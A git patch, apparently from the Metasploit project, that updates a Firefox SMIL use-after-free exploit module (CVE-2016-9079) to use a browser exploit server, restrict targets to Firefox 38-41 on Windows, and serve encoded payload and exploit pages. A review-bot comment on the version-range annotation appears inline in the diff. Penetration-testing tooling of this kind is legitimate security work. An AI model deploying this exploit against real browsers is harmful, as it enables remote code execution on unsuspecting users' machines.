From 3c6fa12acab618aeffd0f76c96250c5fee7334a1 Mon Sep 17 00:00:00 2001
From: wchen-r7
Date: Tue, 31 Jan 2017 16:04:16 -0600
Subject: [PATCH] Update firefox_smil_uaf to use BrowserExploitServer

---
 Gemfile.lock | 2 +-
 .../windows/browser/firefox_smil_uaf.rb | 42 +++++++++----------
 2 files changed, 20 insertions(+), 24 deletions(-)

diff --git a/Gemfile.lock b/Gemfile.lock
index 575ff96d2a..65189ce35c 100644
--- a/Gemfile.lock
+++ b/Gemfile.lock
@@ -250,7 +250,7 @@ GEM
 metasm
 rex-arch
 rex-text
- rex-exploitation (0.1.8)
+ rex-exploitation (0.1.10)
 jsobfu
 metasm
 rex-arch
diff --git a/modules/exploits/windows/browser/firefox_smil_uaf.rb b/modules/exploits/windows/browser/firefox_smil_uaf.rb
index db02b64685..3031bde126 100644
--- a/modules/exploits/windows/browser/firefox_smil_uaf.rb
+++ b/modules/exploits/windows/browser/firefox_smil_uaf.rb
@@ -8,7 +8,7 @@ require 'msf/core'
 class MetasploitModule < Msf::Exploit::Remote
 Rank = NormalRanking
 
- include Msf::Exploit::Remote::HttpServer
+ include Msf::Exploit::Remote::BrowserExploitServer
 
 def initialize(info={})
 super(update_info(info,
@@ -25,9 +25,17 @@ require 'msf/core'
 'William Webb ' # Metasploit module
 ],
 'Platform' => 'win',
+ 'BrowserRequirements' =>
+ {
+ source: /script/i,
+ os_name: OperatingSystems::Match::WINDOWS,
+ ua_name: HttpClients::FF,
+ # Fixed in Firefox 50.0.2
+ ua_ver: lambda { |ver| ver.to_i.between?(38, 41) }
+ },
 'Targets' =>
 [
- [ 'Mozilla Firefox',
+ [ 'Mozilla Firefox 38 to 41',
 {
 'Platform' => 'win',
 'Arch' => ARCH_X86,
@@ -40,11 +48,11 @@ require 'msf/core'
 'InitialAutoRunScript' => 'migrate -f'
 },
 'References' =>
- [
- [ 'CVE', '2016-9079' ],
- [ 'Bugzilla', '1321066' ]
- ],
- 'Arch' => ARCH_X86,
+ [
+ [ 'CVE', '2016-9079' ],
+ [ 'URL', 'https://bugzilla.mozilla.org/show_bug.cgi?id=1321066' ],
+ [ 'URL', 'https://www.mozilla.org/en-US/security/advisories/mfsa2016-92/' ]
+ ],
 'DisclosureDate' => "Nov 30 2016",
 'DefaultTarget' => 0
 )
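Review bot: The comment `# Fixed in Firefox 50.0.2` placed directly above `ua_ver: lambda { |ver| ver.to_i.between?(38, 41) }` in the new `BrowserRequirements` hash does not explain the range it annotates: the lambda only accepts 38 through 41, while the comment names the fixed release, so a reader cannot tell whether the upper bound is a deliberate tested-version limit or an oversight. I would replace it with a comment stating both facts, e.g. `# Vulnerable until the fix in Firefox 50.0.2; this module only targets 38-41 (presumably the releases it was validated against), hence the narrower range -- confirm before widening`. It is also worth a short note that `ver.to_i` maps a missing or non-numeric version to 0, which falls outside the range and so rejects the client rather than raising, since a later maintainer might otherwise "fix" it into an exception. The renamed target `'Mozilla Firefox 38 to 41'` already agrees with the lambda, which is good. The enclosing `initialize` body continues outside this hunk.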
@@ -60,7 +68,7 @@ require 'msf/core'
 p = payload.encoded
 arch = Rex::Arch.endian(target.arch)
 payload_final = Rex::Text.to_unescape(p, arch, prefix='\\u')
- base_uri = "#{get_resource.chomp('/')}"
+ base_uri = get_module_resource
 
 # stuff that gets adjusted alot during testing
@@ -248,28 +256,16 @@ require 'msf/core'
 send_response(cli, c, { 'Content-Type' => 'application/javascript', 'Pragma' => 'no-cache', 'Cache-Control' => 'no-cache', 'Connection' => 'close' })
 end
 
- def is_ff_on_windows(user_agent)
- target_hash = fingerprint_user_agent(user_agent)
- if target_hash[:ua_name] !~ /Firefox/ or target_hash[:os_name] !~ /Windows/
- return false
- end
- return true
- end
-
- def on_request_uri(cli, request)
+ def on_request_exploit(cli, request, browser_info)
 print_status("Got request: #{request.uri}")
 print_status("From: #{request.headers['User-Agent']}")
- if (!is_ff_on_windows(request.headers['User-Agent']))
- print_error("Unsupported user agent: #{request.headers['User-Agent']}")
- send_not_found(cli)
- close_client(cli)
- return
- end
+
 if request.uri =~ /worker\.js/
 print_status("Sending worker thread Javascript ...")
 worker_js(cli)
 return
 end
+
 if request.uri =~ /index\.html/ or request.uri =~ /\//
 print_status("Sending exploit HTML ...")